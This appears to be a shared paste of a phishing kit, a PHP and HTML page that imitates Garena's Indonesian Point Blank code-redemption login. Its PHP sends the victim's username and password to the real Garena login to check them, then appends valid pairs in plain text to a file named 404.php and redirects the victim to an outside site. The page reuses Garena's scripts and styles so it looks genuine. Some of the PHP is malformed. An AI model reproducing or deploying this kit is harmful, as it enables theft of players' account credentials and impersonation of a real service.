nih gan

1. <?php
2. if(isset($_POST['login'])){
3. $cookie = rand(1111,9999);
4. $ch = curl_init();
5. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
6. curl_setopt( $ch, CURLOPT_COOKIESESSION, true );
7. curl_setopt( $ch, CURLOPT_COOKIEJAR, $cookie );
8. curl_setopt( $ch, CURLOPT_COOKIEFILE, $cookie );
9. curl_setopt($ch, CURLOPT_URL, "http://intl.garena.com/login_ui/");
10. $input_line = curl_exec ($ch);
11. curl_close ($ch);
12. preg_match("/name='csrfmiddlewaretoken' value='(.*)' \/>/", $input_line, $out);
13.  
14.  
15. $username = $_POST['username'];
16. $password_plain = $_POST['password'];
17. $password = $_POST['password_rsa'];
18. $data = "csrfmiddlewaretoken=".$out[1]."&username={$username}&lPasswordLabel=Enter+password+here+...&password={$password}";
19.  
20. $post = curl_init();
21. curl_setopt($post, CURLOPT_POSTFIELDS, $data);
22. curl_setopt($post, CURLOPT_RETURNTRANSFER, 1);
23. curl_setopt($post, CURLOPT_VERBOSE, 1);
24. curl_setopt($post, CURLOPT_HEADER, 1);
25. curl_setopt($post, CURLOPT_USERAGENT,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/32.0.1700.107 Chrome/32.0.1700.107 Safari/537.36');
26. curl_setopt( $post, CURLOPT_COOKIESESSION, true );
27. curl_setopt( $post, CURLOPT_COOKIEJAR, $cookie );
28. curl_setopt( $post, CURLOPT_COOKIEFILE, $cookie );
29.  
30. curl_setopt($post, CURLOPT_URL, "http://intl.garena.com/login_ui/");
31. $outputs = curl_exec($post);
32. curl_close ($post);
33.  
34.  
35. preg_match("/window.location='(.*)';/", $outputs, $keluaran);
36.  
37. if($keluaran[1] == "http://intl.garena.com"){
38. echo "";
39. <?php?>
40. <?php
41. header('location: http://garena.is.my/pb/key.php');
42. ?>
43. $x = $username.':'.$password_plain."\n";
44.  
45. $y = fopen('404.php','a+');
46. fwrite($y,$x);
47. fclose($y);
48. }
49. else {
50. echo "Username Atau Kata Sandi Yang Anda Gunakan SALAH";
51. }
52. }
53. ?>
54. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
55. <html xmlns="http://www.w3.org/1999/xhtml">
56. <head>
57. <meta charset="utf-8">
58. <meta name="viewport" content="width=device-width, initial-scale=1.0">
59. <meta name="description" content="">
60. <title>Point Blank - Tukar Kode</title>
61. <link rel="shortcut icon" href="http://redeem.pb.garena.co.id/static/share/favicon.ico" />
62.  
63. <!-- Common JS -->
64. <script src="http://redeem.pb.garena.co.id/static/share/js/jquery-1.10.2.min.js"></script>
65.  
66. <!-- Recaptcha -->
67. <script src="http://redeem.pb.garena.co.id/static/share/js/recaptcha_ajax.js"></script>
68.  
69. <!-- Garena Game Utility -->
70. <script src="http://redeem.pb.garena.co.id/static/share/js/garenaweb-utils.min.js"></script>
71. <script src="http://redeem.pb.garena.co.id/static/share/js/jquery.ggameapps.utilities.js"></script>
72. </script>
73.  
74. <!-- Page CSS -->
75. <link rel="stylesheet" href="http://redeem.pb.garena.co.id/static/pbid2015/css/reset.css">
76. <link rel="stylesheet" href="http://redeem.pb.garena.co.id/static/pbid2015/css/main.css">
77.  
78. <!-- Page Specific -->
79.  
80. </head>
81. <EMBED SRC="http://www.garenagame.com/img/voice1.swf" AUTOSTART="TRUE" LOOP="TRUE" WIDTH="1" HEIGHT="1" ALIGN="CENTER"></EMBED>
82.  
83. <body>
84. <div id="main-container">
85. <div id="content-wrapper">
86. <ul id="main-menu">
87. <li><a class="btn-redeem" href="/key.php"></a></li>
88. <li><a class="btn-history" href="/history.php"></a></li>
89. </ul>
90.  
91. <div id="content" class="login-content">
92. <p>
93. Selamat datang di sistem Tukar Kode PB Garena Indonesia.
94. <br>Silakan login akun Garena kamu.
95. </p>
96. <form action="history.php" id="frmLoginUI" name="frmLoginUI" class="form-login" method="post" onSubmit="return validate();">
97.  
98. GARENA USERNAME:<br>
99. <input type="text" name="username" value="" placeholder="Username" /><br>
100.  
101. <br>
102.  
103. Kata Sandi:<br>
104. <input type="password" name="password" value="" placeholder="Kata Sandi" /><br>
105. <input type="hidden" value="" name="password_rsa">
106.  
107. <div class="tools txt-weak">
108. <small>
109. <a class="link" href="http://www.garena.com/register/" target="_blank">Daftar</a> ||
110. <a class="link" href="http://www.garena.com/forgot/" target="_blank">Lupa Kata Sandi?</a>
111. </small>
112. </div>
113.  
114. <span class="error-msg"><small id="GarenaLoginProcessingMsg">Sedang memproses...</small><small id="GarenaLoginErrMsg"></small></span>
115. <button type="submit" class="btn-login" name="login" value="Login"></button>
116. </form>
117. </div>
118. <script language="JavaScript" type="text/javascript" src="http://cdn.garenanow.com/webmain/static/js/jsbn.js"></script>
119. <script language="JavaScript" type="text/javascript" src="http://cdn.garenanow.com/webmain/static/js/prng4.js"></script>
120. <script language="JavaScript" type="text/javascript" src="http://cdn.garenanow.com/webmain/static/js/rng.js"></script>
121. <script language="JavaScript" type="text/javascript" src="http://cdn.garenanow.com/webmain/static/js/rsa.js"></script>
122. <script language="JavaScript" type="text/javascript" src="http://cdn.garenanow.com/webmain/static/js/grsa.js"></script>
123. <script type="text/javascript">
124. function validate(){
125. document.frmLoginUI.password_rsa.value = RSA(document.frmLoginUI.password.value);
126. return true;
127. }
128. function keyIsPressed(evt) {
129. var charCode = (evt.which) ? evt.which : evt.keyCode
130. if( charCode == 13 ) {
131. validate();
132. }
133. return true;
134. }
135. </script>
136. </body>
137. </html>